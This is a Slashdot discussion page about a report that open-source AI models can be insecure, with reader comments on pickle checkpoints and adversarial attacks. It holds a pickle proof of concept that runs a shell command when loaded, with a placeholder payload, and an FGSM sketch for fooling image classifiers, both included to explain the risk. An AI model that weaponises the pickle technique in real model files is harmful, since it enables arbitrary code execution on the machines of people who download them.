AI Security

Free AI Programs Prone To Security Risks, Researchers Say (bloomberg.com) 17

Companies rushing to adopt hot new types of artificial intelligence should exercise caution when using open-source versions of the technology, some of which may not work as advertised or include flaws that hackers can exploit, security researchers say. From a report: There are few ways to know in advance if a particular AI model -- a program made up of algorithms that can do such things as generate text, images and predictions -- is safe, said Hyrum Anderson, distinguished engineer at Robust Intelligence, a machine learning security company that lists the US Defense Department as a client. Anderson said he found that half the publicly available models for classifying images failed 40% of his tests. The goal was to determine whether a malicious actor could alter the outputs of AI programs in a manner that could constitute a security risk or provide incorrect information. Often, models use file types that are particularly prone to security flaws, Anderson said. It's an issue because so many companies are grabbing models from publicly available sources without fully understanding the underlying technology, rather than creating their own. Ninety percent of the companies Robust Intelligence works with download models from Hugging Face, a repository of AI models, he said.
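The vulnerable "file types" Anderson mentions are most likely Python's pickle-based checkpoint formats (a point a commenter below picks up): unpickling a file can execute arbitrary code, so a downloaded "model" is effectively a program. A minimal sketch of the failure mode, with a deliberately harmless, hypothetical payload:

import os
import pickle

# Sketch of why loading an untrusted pickle checkpoint is dangerous:
# pickle lets an object specify arbitrary code to run at load time
# via __reduce__, so a "model file" can carry an executable payload.
class MaliciousPayload:
    def __reduce__(self):
        # Harmless stand-in; a real attacker would exfiltrate data
        # or spawn a shell instead of echoing a message.
        return (os.system, ("echo pwned by a model checkpoint",))

blob = pickle.dumps(MaliciousPayload())

# The victim only has to *load* the file -- no further calls needed.
pickle.loads(blob)  # executes the payload during deserialization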
Comments Filter:
  • Oh boy... (Score:5, Funny)

    by satanicat ( 239025 ) on Wednesday March 29, 2023 @04:47PM (#63409944)

    Obligatory XKCD: https://xkcd.com/2228/

  • In theory (Score:5, Insightful)

    by Baron_Yam ( 643147 ) on Wednesday March 29, 2023 @04:49PM (#63409954)

    With open source you can find out about the bugs at the same time as the bad guys.

    With closed source, you'll find out after you're burned - if you can afford the lawsuit against the software vendor.

    • by Draeven ( 166561 )

      In this case, closed source means in the cloud. The security vulnerabilities they're talking about here are malicious code embedded in Python pickle-formatted checkpoints.

      tl;dr: Don't download Stable Diffusion; pay us, OpenAI, the trustworthy saviors of humanity, to use our image generator instead.

      • tl;dr: Don't download Stable Diffusion; pay us, OpenAI, the trustworthy saviors of humanity, to use our image generator instead.

        Yep. My comment on the other article [slashdot.org] didn't last 12 hours before this article's "warning" showed up....

        "Beware of he who would deny you access to information, for in his heart he dreams himself your master." - Commisioner Pravin Lal.

    • This is true with source code -- even a relatively large code base. But a large language model can be terabytes upon terabytes of data, and it's unlikely to have been scoured with the diligence of, say, the Linux kernel.

  • And so it begins. (Score:5, Interesting)

    by nightflameauto ( 6607976 ) on Wednesday March 29, 2023 @05:11PM (#63410024)

    AI, such as it is today, takes massive amounts of horsepower, which is barrier to entry number 1. All the yelling about controls from the massive corporations hoping to profit from AI today is, or likely soon will be once governments take it seriously enough, barrier to entry number 2. "Open Source is bad, mmmmkay," is barrier to entry number 3, and the real kick in the crotch for those of us who would have liked to see this particular technology not become just one more bit of possibility used to pull yet more money away from people and consolidate it in the hands of the few.

    It's not like AI itself isn't filled with scary possibilities. Let's do everything we can to keep it from being open and available without oversight from our corporate overlords, please. We've seen over the centuries that big money interests always do what is right for the overall population, so they're the ones best equipped to decide for us what's right and wrong on this front as well.

    I thought even the press grew tired of the "open source = worthless because it might have bugs" rhetoric a long while back. Because closed source has such a stellar track record lately. Glad to see some layers of tech bullshit never go out of style.

  • by larryjoe ( 135075 ) on Wednesday March 29, 2023 @05:15PM (#63410032)

    There are no AI models that are 100% accurate. Yet, there are quite a few software systems that incorporate these less than perfect AI models. The key is the realization that the AI models are only part of the pipeline and that succeeding stages of the pipeline are needed to compensate for the expected AI model inaccuracy. For example, for an autonomous vehicle processing camera images at 30 fps, if the AI object detection were 99% accurate (which is really good), then an error would be expected every few seconds. A tracker that compensates for that inaccuracy is indispensable.
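    (For concreteness: at 30 frames per second, a 1% per-frame error rate means 30 × 0.01 = 0.3 expected errors per second, i.e. roughly one every three to four seconds.)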

    Now, there is academic research on adversarial attacks, where the inputs to the perception stage are slightly altered to produce security-critical effects. However, the required attack models are usually a bit extreme and arguably not practical, i.e., hard to pull off in practice or requiring enough system access that the system has already been compromised. But even the vulnerability aspects of these attacks are inherent in the models and have nothing to do with the purchase price or permissiveness of the software license.
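    The canonical example from that literature is the fast gradient sign method (FGSM): nudge each input pixel in the direction that increases the classifier's loss, within a small per-pixel budget. A minimal PyTorch sketch; the tiny linear "classifier" and all the numbers here are placeholders, not anything from the article:

    import torch
    import torch.nn as nn

    # FGSM sketch: perturb an input toward higher classifier loss,
    # bounded per pixel by a small epsilon.
    model = nn.Sequential(nn.Flatten(), nn.Linear(3 * 32 * 32, 10))
    loss_fn = nn.CrossEntropyLoss()

    x = torch.rand(1, 3, 32, 32, requires_grad=True)  # stand-in "camera frame"
    y = torch.tensor([3])                             # assumed true class

    loss = loss_fn(model(x), y)
    loss.backward()

    epsilon = 0.03  # perturbation budget, small enough to be near-invisible
    x_adv = (x + epsilon * x.grad.sign()).clamp(0.0, 1.0).detach()
    # x_adv looks unchanged to a human but can flip the model's prediction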

    • Well then, that went well. Clearly I wasn't properly caffeinated. Ignore me, everyone. They were talking about free, not open source. Funny how my mind went right there. Meh. Long day.

    • by gweihir ( 88907 )

      Actually, it is a security risk when used in security-critical applications. The first problem is that it is hard to find out when exactly it is hallucinating or giving false information, such as not detecting an attack. The attacker-defender asymmetry applies: an attacker needs only one vulnerability to get in; a defender needs to fix all of them (or at least all that an attacker can potentially find). Second, an attacker can introduce obscure or bizarre cases that nobody expects but that the attacker later exploits.

  • by sarren1901 ( 5415506 ) on Wednesday March 29, 2023 @05:26PM (#63410056)

    Research shows!

  • This just in (Score:3, Interesting)

    by Tyr07 ( 8900565 ) on Wednesday March 29, 2023 @05:43PM (#63410094)

    Corporations are terrified that you may take advantage of new technology and AI without paying th... I mean, without due consideration for your safety.

  • by lpq ( 583377 ) on Wednesday March 29, 2023 @07:29PM (#63410312) Homepage Journal

    All your data is kept on the servers of the company whose service you are using. Not only is that a hacking risk, but a privacy risk as well. Until versions are available that allow local storage, companies will be vulnerable to hacks of their vendor, or to plain snooping by their vendor to make sure their use aligns with what the vendor wants to permit.

  • by JasterBobaMereel ( 1102861 ) on Thursday March 30, 2023 @04:48AM (#63410906)

    ...and so they say Open Source is unsafe and claim they can prove it...

    then fail to show that their closed-source system is any safer.

  • Straight from Microsoft's 1999 FUD 101 textbook.

  • The only difference is that finding these flaws in closed commercial stuff is harder. The same risks exist there, and because people think they can hide them, they are often worse.

"Sometimes insanity is the only alternative" -- button at a Science Fiction convention.

Working...